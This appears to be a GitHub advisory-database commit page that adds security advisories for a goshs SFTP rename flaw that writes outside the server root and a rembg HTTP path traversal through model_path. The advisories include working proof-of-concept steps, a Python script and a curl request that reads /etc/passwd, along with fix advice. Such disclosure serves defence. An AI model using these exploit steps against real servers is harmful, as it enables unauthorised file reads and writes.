Skip to content

Commit 2f3328d

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-2943-crp8-38xx GHSA-3wqj-33cg-xc48 GHSA-wvhv-qcqf-f3cx
1 parent 2566750 commit 2f3328d

3 files changed

Lines changed: 200 additions & 0 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-2943-crp8-38xx/GHSA-2943-crp8-38xx.json

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2943-crp8-38xx",
4+
"modified": "2026-04-10T20:00:28Z",
5+
"published": "2026-04-10T20:00:28Z",
6+
"aliases": [
7+
"CVE-2026-40188"
8+
],
9+
"summary": "goshs is Missing Write Protection for Parametric Data Values",
10+
"details": "### Summary\nThe SFTP command rename sanitizes only the source path and not the destination, so it is possible to write outside of the root directory of the SFTP. \n\n### Details\n\nHere is the issue:\n```go\n// helper.go:155-215\nfunc cmdFile(root string, r *sftp.Request, ip string, sftpServer *SFTPServer) error {\n fullPath, err := sanitizePath(r.Filepath, root) // Source: SANITIZED\n if err != nil {\n return err\n }\n switch r.Method {\n // ...\n case \"Rename\":\n err := os.Rename(fullPath, r.Target) // Destination: NOT SANITIZED!\n```\n\n\n### PoC\n\nTo exploit just upload a file on the SFTP and rename it to a file with full path. \n\nCurrently no key.txt file inside /tmp\n\n``` bash\n$ ls key.txt\nls: key.txt: No such file or directory\n```\n\n\nStart the SFTP server:\n``` bash\n/tmp/sftp-server $ goshs -sftp -b 'user:user' -d .\nWARNING[2026-04-02 20:00:18] upload-folder mode deactivated due to use of 'sftp' mode\nWARNING[2026-04-02 20:00:18] There is a newer Version (v2.0.0-beta.3) of goshs available. Run --update to update goshs.\nINFO [2026-04-02 20:00:18] Starting SFTP server on port 0.0.0.0:2022\nWARNING[2026-04-02 20:00:18] You are using basic auth without SSL. Your credentials will be transferred in cleartext. Consider using -s, too.\nINFO [2026-04-02 20:00:18] Using basic auth with user 'user' and password 'user'\nINFO [2026-04-02 20:00:18] Download embedded file at: /example.txt?embedded\nINFO [2026-04-02 20:00:18] Serving on interface lo0 bound to 127.0.0.1:8000\nINFO [2026-04-02 20:00:18] Serving on interface en0 bound to 192.168.68.51:8000\nINFO [2026-04-02 20:00:18] Serving HTTP from /tmp/sftp-server\n```\n\nConnect to the SFTP and uploading the file:\n``` bash\n$ sftp -P 2022 user@localhost\nuser@localhost's password:\nConnected to localhost.\nsftp> put /Users/user/Downloads/key.txt\nUploading /Users/user/Downloads/key.txt to /tmp/sftp-server/key.txt\nkey.txt 100% 15 40.9KB/s 00:00\n```\n\nThe file is stored properly. \n\ngoshs log:\n```\nINFO [2026-04-02 20:03:31] SFTP: [::1]:61742 - [Put] - \"/tmp/sftp-server/key.txt\"\n```\n\nRename command with full path:\n``` bash\nsftp> rename key.txt /tmp/key.txt\n```\n\ngoshs log:\n```\nINFO [2026-04-02 20:04:09] SFTP: [::1]:61742 - [Rename] - \"/tmp/sftp-server/key.txt to /tmp/key.txt\"\n```\n\nKey file is now in /tmp\n```\n$ ls key.txt\nkey.txt\n```\n\n\n### Impact\nThis allows file write and can be used either for an RCE in form of overwrite an SSH key, or by overwriting a configuration etc.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/patrickhener/goshs"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.0.7"
29+
},
30+
{
31+
"last_affected": "1.1.4"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/patrickhener/goshs/security/advisories/GHSA-2943-crp8-38xx"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/patrickhener/goshs/commit/141c188ce270ffbec087844a50e5e695b7da7744"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/patrickhener/goshs"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/patrickhener/goshs/releases/tag/v2.0.0-beta.4"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-1314"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-04-10T20:00:28Z",
63+
"nvd_published_at": null
64+
}
65+
}

advisories/github-reviewed/2026/04/GHSA-3wqj-33cg-xc48/GHSA-3wqj-33cg-xc48.json

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-3wqj-33cg-xc48",
4+
"modified": "2026-04-10T20:00:12Z",
5+
"published": "2026-04-10T20:00:12Z",
6+
"aliases": [
7+
"CVE-2026-40086"
8+
],
9+
"summary": "Rembg has a Path Traversal via Custom Model Loading",
10+
"details": "## Summary\n\nA **path traversal vulnerability** in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. By sending a crafted request with a malicious `model_path` parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages.\n\n**CWE IDs:** CWE-22 (Path Traversal), CWE-73 (External Control of File Name or Path)\n\n---\n\n## Details\n\n### Vulnerable Code Flow\n\nThe vulnerability exists in how the HTTP server handles the `extras` JSON parameter for custom model types (`u2net_custom`, `dis_custom`, `ben_custom`).\n\n**1. Entry Point** - [`rembg/commands/s_command.py`](https://github.com/danielgatis/rembg/blob/main/rembg/commands/s_command.py#L191-L202)\n\n```python\ndef im_without_bg(content: bytes, commons: CommonQueryParams) -> Response:\n kwargs = {}\n if commons.extras:\n try:\n kwargs.update(json.loads(commons.extras)) # ❌ No validation\n except Exception:\n pass\n # ...\n session = new_session(commons.model, **kwargs) # Passes arbitrary kwargs\n```\n\nThe `extras` parameter is parsed as JSON and passed directly to `new_session()` without any validation.\n\n**2. Path Handling** - [`rembg/sessions/u2net_custom.py`](https://github.com/danielgatis/rembg/blob/main/rembg/sessions/u2net_custom.py#L79-L83)\n\n```python\n@classmethod\ndef download_models(cls, *args, **kwargs):\n model_path = kwargs.get(\"model_path\")\n if model_path is None:\n raise ValueError(\"model_path is required\")\n return os.path.abspath(os.path.expanduser(model_path)) # ❌ No path validation\n```\n\nThe `model_path` is returned with tilde expansion but no validation against path traversal.\n\n**3. File Read** - [`rembg/sessions/base.py`](https://github.com/danielgatis/rembg/blob/main/rembg/sessions/base.py#L34-L38)\n\n```python\nself.inner_session = ort.InferenceSession(\n str(self.__class__.download_models(*args, **kwargs)), # Reads file\n # ...\n)\n```\n\nThe path is passed to `onnxruntime.InferenceSession()` which attempts to read and parse the file.\n\n### Root Cause\n\nThe custom model feature was designed for **CLI usage** where users already have local filesystem access. However, this feature is also exposed via the **HTTP API** without any restrictions, creating a security boundary violation.\n\n---\n\n## PoC\n\n### Prerequisites\n\n- Python 3.10+\n- rembg installed with CLI support: `pip install \"rembg[cpu,cli]\"`\n\n### Step 1: Start the Vulnerable Server\n\nOpen a terminal and run:\n\n```bash\nrembg s --host 0.0.0.0 --port 7000\n```\n\nYou should see output like:\n```\nTo access the API documentation, go to http://localhost:7000/api\nTo access the UI, go to http://localhost:7000\n```\n\n### Step 2: Send the Exploit Request\n\nOpen a **second terminal** and run this Python script:\n\n```python\nimport requests\nimport json\nimport urllib.parse\nfrom io import BytesIO\n\n# Minimal valid 1x1 PNG image (required for the request)\nMINIMAL_PNG = bytes([\n 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A,\n 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48, 0x44, 0x52,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01,\n 0x08, 0x02, 0x00, 0x00, 0x00, 0x90, 0x77, 0x53,\n 0xDE, 0x00, 0x00, 0x00, 0x0C, 0x49, 0x44, 0x41,\n 0x54, 0x08, 0xD7, 0x63, 0xF8, 0xFF, 0xFF, 0x3F,\n 0x00, 0x05, 0xFE, 0x02, 0xFE, 0xDC, 0xCC, 0x59,\n 0xE7, 0x00, 0x00, 0x00, 0x00, 0x49, 0x45, 0x4E,\n 0x44, 0xAE, 0x42, 0x60, 0x82\n])\n\n# Target paths to test\ntest_paths = [\n \"/etc/passwd\", # System file (should exist)\n \"/nonexistent/file.txt\", # Non-existent file\n]\n\nfor path in test_paths:\n print(f\"\\n[*] Testing path: {path}\")\n \n # Build request - extras must be in URL query string\n extras = json.dumps({\"model_path\": path})\n url = f\"http://localhost:7000/api/remove?extras={urllib.parse.quote(extras)}\"\n \n response = requests.post(\n url,\n files={\"file\": (\"test.png\", BytesIO(MINIMAL_PNG), \"image/png\")},\n data={\"model\": \"u2net_custom\"},\n timeout=30\n )\n \n print(f\" Status: {response.status_code}\")\n print(f\" Response: {response.text[:100]}\")\n```\n\nOr use **curl** directly:\n\n```bash\n# Create a minimal PNG file\npython3 -c \"import sys; sys.stdout.buffer.write(bytes([0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A,0x00,0x00,0x00,0x0D,0x49,0x48,0x44,0x52,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x02,0x00,0x00,0x00,0x90,0x77,0x53,0xDE,0x00,0x00,0x00,0x0C,0x49,0x44,0x41,0x54,0x08,0xD7,0x63,0xF8,0xFF,0xFF,0x3F,0x00,0x05,0xFE,0x02,0xFE,0xDC,0xCC,0x59,0xE7,0x00,0x00,0x00,0x00,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82]))\" > /tmp/test.png\n\n# Send exploit request targeting /etc/passwd\ncurl -X POST 'http://localhost:7000/api/remove?extras=%7B%22model_path%22%3A%22%2Fetc%2Fpasswd%22%7D' \\\n -F \"model=u2net_custom\" \\\n -F \"file=@/tmp/test.png\"\n```\n\n### Step 3: Verify in Server Logs\n\nGo back to the **first terminal** where the server is running. You will see error messages like:\n\n```\nonnxruntime.capi.onnxruntime_pybind11_state.InvalidProtobuf: \n[ONNXRuntimeError] : 7 : INVALID_PROTOBUF : Load model from /etc/passwd failed:Protobuf parsing failed.\n```\n\n```\nonnxruntime.capi.onnxruntime_pybind11_state.NoSuchFile: \n[ONNXRuntimeError] : 3 : NO_SUCHFILE : Load model from /nonexistent/file.txt failed. File doesn't exist\n```\n\n### Understanding the Results\n\n| Server Log Message | What It Proves |\n|-------------------|----------------|\n| `Load model from /etc/passwd failed:Protobuf parsing failed` | ✅ File **exists and was read** by onnxruntime |\n| `Load model from /etc/shadow failed:Permission denied` | ✅ File **exists** but process lacks permission |\n| `Load model from /nonexistent/... failed. File doesn't exist` | ✅ File **does not exist** - enables enumeration |\n\n**The key proof:** The message `\"Load model from /etc/passwd failed:Protobuf parsing failed\"` proves that:\n1. The attacker-controlled path was passed through without validation\n2. `onnxruntime.InferenceSession()` attempted to **read the file contents**\n3. The file was read but rejected because `/etc/passwd` is not a valid ONNX protobuf\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All users** running `rembg s` (HTTP server mode)\n- **Cloud deployments** where rembg is exposed as an API service\n- **Docker containers** running rembg server\n\n### Attack Scenarios\n\n1. **Information Disclosure**: Attacker enumerates sensitive files (`/etc/passwd`, `.env`, config files)\n2. **Credential Discovery**: Attacker checks for common credential files\n3. **Infrastructure Mapping**: Attacker discovers installed software and system configuration\n4. **Denial of Service**: Attacker attempts to load very large files, exhausting memory\n\n### What is NOT Affected?\n\n- CLI usage (`rembg i`, `rembg p`) - users already have local file access\n- Library usage - developers control the input\n\n---\n\n## Recommended Fix\n\n### Option 1: Disable Custom Models for HTTP API (Recommended)\n\nRemove custom model types from the HTTP API session list:\n\n```python\n# In s_command.py, filter out custom models\nALLOWED_HTTP_MODELS = [\n name for name in sessions_names \n if not name.endswith('_custom')\n]\n\n# Use ALLOWED_HTTP_MODELS in the model parameter regex\nmodel: str = Query(\n regex=r\"(\" + \"|\".join(ALLOWED_HTTP_MODELS) + \")\",\n default=\"u2net\",\n)\n```\n\n### Option 2: Validate model_path Against Allowlist\n\nIf custom models must be supported via HTTP:\n\n```python\nimport os\n\nALLOWED_MODEL_DIRS = [\n os.path.expanduser(\"~/.u2net\"),\n \"/app/models\", # or your designated model directory\n]\n\ndef validate_model_path(path: str) -> str:\n \"\"\"Validate model path is within allowed directories.\"\"\"\n abs_path = os.path.abspath(os.path.expanduser(path))\n \n for allowed_dir in ALLOWED_MODEL_DIRS:\n allowed_abs = os.path.abspath(allowed_dir)\n if abs_path.startswith(allowed_abs + os.sep):\n return abs_path\n \n raise ValueError(f\"model_path must be within allowed directories\")\n```\n\n### Option 3: Document Security Considerations\n\nAt minimum, add security warnings to the documentation:\n\n```markdown\n⚠️ **Security Warning**: When running `rembg s` in production:\n- Do NOT expose the server directly to the internet\n- Use a reverse proxy with authentication\n- Consider disabling custom model support\n```\n\n---\n\n## References\n\n- **CWE-22**: [Improper Limitation of a Pathname to a Restricted Directory](https://cwe.mitre.org/data/definitions/22.html)\n- **CWE-73**: [External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n- **OWASP Path Traversal**: [Path Traversal Attack](https://owasp.org/www-community/attacks/Path_Traversal)\n\n---",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "rembg"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.0.75"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40086"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/danielgatis/rembg"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://github.com/danielgatis/rembg/releases/tag/v2.0.75"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-22",
63+
"CWE-73"
64+
],
65+
"severity": "MODERATE",
66+
"github_reviewed": true,
67+
"github_reviewed_at": "2026-04-10T20:00:12Z",
68+
"nvd_published_at": "2026-04-10T17:17:12Z"
69+
}
70+
}

0 commit comments

Comments
 (0)